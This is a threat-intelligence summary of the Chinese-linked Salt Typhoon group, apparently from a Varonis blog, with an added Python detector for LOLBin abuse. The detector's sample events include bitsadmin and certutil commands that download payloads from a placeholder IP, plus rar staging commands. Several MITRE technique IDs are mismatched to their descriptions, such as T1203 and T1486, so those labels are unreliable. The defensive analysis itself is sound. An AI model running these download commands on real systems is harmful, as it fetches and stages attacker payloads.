Salt Typhoon: The Threat Group Behind Major Cyberattacks

Salt Typhoon is an APT group allegedly linked to China’s Ministry of State Security. It targets U.S. infrastructure and government entities, with a focus on corporate data theft and espionage. Its operations rely on advanced techniques and have resulted in numerous breaches, notably of telecom networks and government systems.

Affected: US Government agencies, telecommunications, infrastructure, political candidates

Key points:

  • Salt Typhoon is an Advanced Persistent Threat group linked to China’s Ministry of State Security.
  • Also known as Ghost Emperor, FamousSparrow, Earth Estrie, and UNC2286.
  • The group has been active since at least August 2019, targeting high-value individuals and U.S. infrastructure.
  • Recent breaches include compromises of multiple U.S. telecom networks.
  • Salt Typhoon employs espionage tactics over disruption, focusing on data exfiltration.
  • Utilizes both Living Off the Land Binaries and custom tools like ‘JumbledPath’.
  • Sanctions were imposed on a related Chinese organization, Sichuan Juxinhe Network Technology.
  • Employs advanced techniques for stealthy network infiltration and information gathering.
  • Common TTPs include abuse of LOLBins, command execution via WMI, and exploitation of vulnerabilities in well-known software.
  • Robust security measures and incident response plans are essential defenses against such threats.

MITRE Techniques:

  • Abuse Elevation Control Mechanism (T1548) – Utilizes tools such as Mimikatz and Cobalt Strike for privilege escalation.
  • Living Off the Land Binaries (T1203) – Employs BITSAdmin, CertUtil, and PowerShell for executing operations.
  • Remote File Copy (T1105) – Uses “copy.exe” and “.cab” files for payload delivery and storage.
  • Command-Line Interface (T1059) – Execution of batch scripts for various malicious activities.
  • Data Encrypted for Impact (T1486) – Compresses sensitive data using rar.exe before exfiltration.
  • Exploitation of Public-Facing Applications (T1190) – Exploited vulnerabilities in Ivanti Secure Connect VPN and Microsoft Exchange.
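As an added illustration (not code from the Varonis article or the threat report it summarizes), the Python below runs simple detection rules over constructed process-creation events for the LOLBin, WMI-spawned shell and rar.exe staging patterns listed above; the event format, rule names, category labels and sample values are assumptions.

```python
import re

# Constructed sample process-creation events (hypothetical, not from the article),
# written as "parent image> image command line". The IP address is illustrative.
SAMPLE_EVENTS = [
    "cmd.exe> bitsadmin.exe /transfer job /download /priority high http://198.51.100.7/u.cab C:\\Users\\Public\\u.cab",
    "cmd.exe> certutil.exe -urlcache -split -f http://198.51.100.7/p.txt C:\\Users\\Public\\p.txt",
    "cmd.exe> certutil.exe -decode C:\\Users\\Public\\p.txt C:\\Users\\Public\\p.exe",
    "WmiPrvSE.exe> cmd.exe /c C:\\Users\\Public\\run.bat",
    "cmd.exe> rar.exe a -hp C:\\Users\\Public\\out.rar C:\\Users\\Public\\docs",
    "explorer.exe> notepad.exe C:\\Users\\alice\\notes.txt",
    "svchost.exe> certutil.exe -verify C:\\Windows\\Temp\\cert.cer",
]

# Detection rules: (rule name, category as the article describes it, parent-image
# pattern or None, command-line pattern). All matching is case-insensitive.
RULES = [
    ("bitsadmin_transfer", "Remote File Copy", None, r"^bitsadmin(\.exe)?\s.*/transfer\b"),
    ("certutil_urlcache", "Remote File Copy", None, r"^certutil(\.exe)?\s.*-urlcache\b"),
    ("certutil_decode", "Living Off the Land Binaries", None, r"^certutil(\.exe)?\s.*-decode\b"),
    ("wmi_spawned_shell", "Command-Line Interface", r"^wmiprvse(\.exe)?$", r"^(cmd|powershell)(\.exe)?\b"),
    ("rar_archive_staging", "Data compression before exfiltration", None, r"^rar(\.exe)?\s+a\b"),
]


def split_event(line):
    """Split 'parent> command line' into (parent, command line); tolerate a missing parent."""
    parent, sep, cmd = line.partition("> ")
    return (parent, cmd) if sep else ("", line)


def detect(events):
    """Return (rule name, category, event) for every event that matches a rule."""
    hits = []
    for line in events:
        parent, cmd = split_event(line)
        for name, category, parent_re, cmd_re in RULES:
            if parent_re and not re.match(parent_re, parent, re.I):
                continue  # rule requires a specific parent (e.g. the WMI provider host)
            if re.match(cmd_re, cmd, re.I):
                hits.append((name, category, line))
    return hits


def categories_seen(hits):
    """Distinct categories observed, sorted, as a quick triage summary."""
    return sorted({category for _, category, _ in hits})


if __name__ == "__main__":
    for name, category, line in detect(SAMPLE_EVENTS):
        print(f"[{category}] {name}: {line}")
```

The benign notepad.exe and certutil -verify events produce no hits, which is the false-positive check a practitioner would want before deploying such patterns.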

Full Story: https://www.varonis.com/blog/salt-typhoon